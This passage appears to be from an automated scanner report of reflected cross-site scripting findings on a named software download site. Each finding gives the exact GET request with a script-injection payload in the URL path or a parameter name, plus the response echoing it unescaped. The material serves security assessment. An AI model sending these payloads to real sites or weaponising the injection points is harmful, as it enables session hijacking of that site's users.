Path:	/downloads/t-64-bit-usenext-download-rizftkeg.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9d5a5"><script>alert(1)</script>39fb5dff735 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads9d5a5"><script>alert(1)</script>39fb5dff735/t-64-bit-usenext-download-rizftkeg.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:18:56 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21324

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/downloads9d5a5"><script>alert(1)</script>39fb5dff735/t-64-bit-usenext-download-rizftkeg.html" />
...[SNIP]...

4.1775. http://www.x64bitdownload.com/downloads/t-64-bit-usenext-download-rizftkeg.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-usenext-download-rizftkeg.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4c06d"><script>alert(1)</script>7dbfa7985a0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/t-64-bit-usenext-download-rizftkeg.html4c06d"><script>alert(1)</script>7dbfa7985a0 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:19:38 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56287

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="referer" value="/downloads/t-64-bit-usenext-download-rizftkeg.html4c06d"><script>alert(1)</script>7dbfa7985a0"/>
...[SNIP]...

4.1776. http://www.x64bitdownload.com/downloads/t-64-bit-usenext-download-rizftkeg.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-usenext-download-rizftkeg.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1902c"><script>alert(1)</script>78f4ba71bdf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/t-64-bit-usenext-download-rizftkeg.html?1902c"><script>alert(1)</script>78f4ba71bdf=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

4.1777. http://www.x64bitdownload.com/downloads/t-64-bit-web-forum-reader-download-ivzgszuq.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-web-forum-reader-download-ivzgszuq.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f97a2"><script>alert(1)</script>fe238360768 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloadsf97a2"><script>alert(1)</script>fe238360768/t-64-bit-web-forum-reader-download-ivzgszuq.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:19:59 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21333

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/downloadsf97a2"><script>alert(1)</script>fe238360768/t-64-bit-web-forum-reader-download-ivzgszuq.html" />
...[SNIP]...

4.1778. http://www.x64bitdownload.com/downloads/t-64-bit-web-forum-reader-download-ivzgszuq.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-web-forum-reader-download-ivzgszuq.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 22641"><script>alert(1)</script>a78c23ad14d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/t-64-bit-web-forum-reader-download-ivzgszuq.html22641"><script>alert(1)</script>a78c23ad14d HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:20:50 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54564

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="referer" value="/downloads/t-64-bit-web-forum-reader-download-ivzgszuq.html22641"><script>alert(1)</script>a78c23ad14d"/>
...[SNIP]...

4.1779. http://www.x64bitdownload.com/downloads/t-64-bit-web-forum-reader-download-ivzgszuq.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-web-forum-reader-download-ivzgszuq.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3401b"><script>alert(1)</script>d76e63f7bc9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/t-64-bit-web-forum-reader-download-ivzgszuq.html?3401b"><script>alert(1)</script>d76e63f7bc9=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:17:00 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54570

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="referer" value="/downloads/t-64-bit-web-forum-reader-download-ivzgszuq.html?3401b"><script>alert(1)</script>d76e63f7bc9=1"/>
...[SNIP]...

4.1780. http://www.x64bitdownload.com/downloads/t-64-bit-web-forum-reader-download-sqifmyiy.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-web-forum-reader-download-sqifmyiy.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e9493"><script>alert(1)</script>26deef30248 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloadse9493"><script>alert(1)</script>26deef30248/t-64-bit-web-forum-reader-download-sqifmyiy.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:19:17 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21333

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/downloadse9493"><script>alert(1)</script>26deef30248/t-64-bit-web-forum-reader-download-sqifmyiy.html" />
...[SNIP]...

4.1781. http://www.x64bitdownload.com/downloads/t-64-bit-web-forum-reader-download-sqifmyiy.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-web-forum-reader-download-sqifmyiy.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8f12c"><script>alert(1)</script>5499298239f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/t-64-bit-web-forum-reader-download-sqifmyiy.html8f12c"><script>alert(1)</script>5499298239f HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:19:58 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54563

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="referer" value="/downloads/t-64-bit-web-forum-reader-download-sqifmyiy.html8f12c"><script>alert(1)</script>5499298239f"/>
...[SNIP]...

4.1782. http://www.x64bitdownload.com/downloads/t-64-bit-web-forum-reader-download-sqifmyiy.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-web-forum-reader-download-sqifmyiy.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d77d"><script>alert(1)</script>3841192b652 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/t-64-bit-web-forum-reader-download-sqifmyiy.html?4d77d"><script>alert(1)</script>3841192b652=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:16:51 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54569

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="referer" value="/downloads/t-64-bit-web-forum-reader-download-sqifmyiy.html?4d77d"><script>alert(1)</script>3841192b652=1"/>
...[SNIP]...

4.1783. http://www.x64bitdownload.com/downloads/t-64-bit-windows-live-mail-download-melibvyx.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-windows-live-mail-download-melibvyx.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3aef"><script>alert(1)</script>f4e866e47d1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloadsa3aef"><script>alert(1)</script>f4e866e47d1/t-64-bit-windows-live-mail-download-melibvyx.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:22:14 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21334

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/downloadsa3aef"><script>alert(1)</script>f4e866e47d1/t-64-bit-windows-live-mail-download-melibvyx.html" />
...[SNIP]...

4.1784. http://www.x64bitdownload.com/downloads/t-64-bit-windows-live-mail-download-melibvyx.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-windows-live-mail-download-melibvyx.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ecd4d"><script>alert(1)</script>4b44f8919a7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/t-64-bit-windows-live-mail-download-melibvyx.htmlecd4d"><script>alert(1)</script>4b44f8919a7 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:23:19 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 52868

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="referer" value="/downloads/t-64-bit-windows-live-mail-download-melibvyx.htmlecd4d"><script>alert(1)</script>4b44f8919a7"/>
...[SNIP]...

4.1785. http://www.x64bitdownload.com/downloads/t-64-bit-windows-live-mail-download-melibvyx.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-windows-live-mail-download-melibvyx.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b3f31"><script>alert(1)</script>a68db57adbf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/t-64-bit-windows-live-mail-download-melibvyx.html?b3f31"><script>alert(1)</script>a68db57adbf=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:18:12 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 52874

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="referer" value="/downloads/t-64-bit-windows-live-mail-download-melibvyx.html?b3f31"><script>alert(1)</script>a68db57adbf=1"/>
...[SNIP]...

4.1786. http://www.x64bitdownload.com/downloads/t-64-bit-windows-live-messenger-2009-download-exrxqhff.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-windows-live-messenger-2009-download-exrxqhff.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 34c74"><script>alert(1)</script>9bb43158f8a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads34c74"><script>alert(1)</script>9bb43158f8a/t-64-bit-windows-live-messenger-2009-download-exrxqhff.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:20:09 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21344

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/downloads34c74"><script>alert(1)</script>9bb43158f8a/t-64-bit-windows-live-messenger-2009-download-exrxqhff.html" />
...[SNIP]...

4.1787. http://www.x64bitdownload.com/downloads/t-64-bit-windows-live-messenger-2009-download-exrxqhff.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-windows-live-messenger-2009-download-exrxqhff.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7b3f8"><script>alert(1)</script>275bf41d948 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/t-64-bit-windows-live-messenger-2009-download-exrxqhff.html7b3f8"><script>alert(1)</script>275bf41d948 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:21:09 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61783

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="referer" value="/downloads/t-64-bit-windows-live-messenger-2009-download-exrxqhff.html7b3f8"><script>alert(1)</script>275bf41d948"/>
...[SNIP]...

4.1788. http://www.x64bitdownload.com/downloads/t-64-bit-windows-live-messenger-2009-download-exrxqhff.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-windows-live-messenger-2009-download-exrxqhff.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5f529"><script>alert(1)</script>0751029a53e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/t-64-bit-windows-live-messenger-2009-download-exrxqhff.html?5f529"><script>alert(1)</script>0751029a53e=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:17:15 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61789

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="referer" value="/downloads/t-64-bit-windows-live-messenger-2009-download-exrxqhff.html?5f529"><script>alert(1)</script>0751029a53e=1"/>
...[SNIP]...

4.1789. http://www.x64bitdownload.com/downloads/t-64-bit-windows-live-messenger-2011-download-rcmfqzer.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-windows-live-messenger-2011-download-rcmfqzer.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 52513"><script>alert(1)</script>afca5fe7516 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads52513"><script>alert(1)</script>afca5fe7516/t-64-bit-windows-live-messenger-2011-download-rcmfqzer.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:23:21 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21344

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/downloads52513"><script>alert(1)</script>afca5fe7516/t-64-bit-windows-live-messenger-2011-download-rcmfqzer.html" />
...[SNIP]...

4.1790. http://www.x64bitdownload.com/downloads/t-64-bit-windows-live-messenger-2011-download-rcmfqzer.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-windows-live-messenger-2011-download-rcmfqzer.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6937"><script>alert(1)</script>33bac6575a4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/t-64-bit-windows-live-messenger-2011-download-rcmfqzer.htmlb6937"><script>alert(1)</script>33bac6575a4 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:24:23 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60335

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="referer" value="/downloads/t-64-bit-windows-live-messenger-2011-download-rcmfqzer.htmlb6937"><script>alert(1)</script>33bac6575a4"/>
...[SNIP]...

4.1791. http://www.x64bitdownload.com/downloads/t-64-bit-windows-live-messenger-2011-download-rcmfqzer.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-windows-live-messenger-2011-download-rcmfqzer.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1f66"><script>alert(1)</script>7df9bf07e5d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/t-64-bit-windows-live-messenger-2011-download-rcmfqzer.html?c1f66"><script>alert(1)</script>7df9bf07e5d=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:18:22 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60341

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
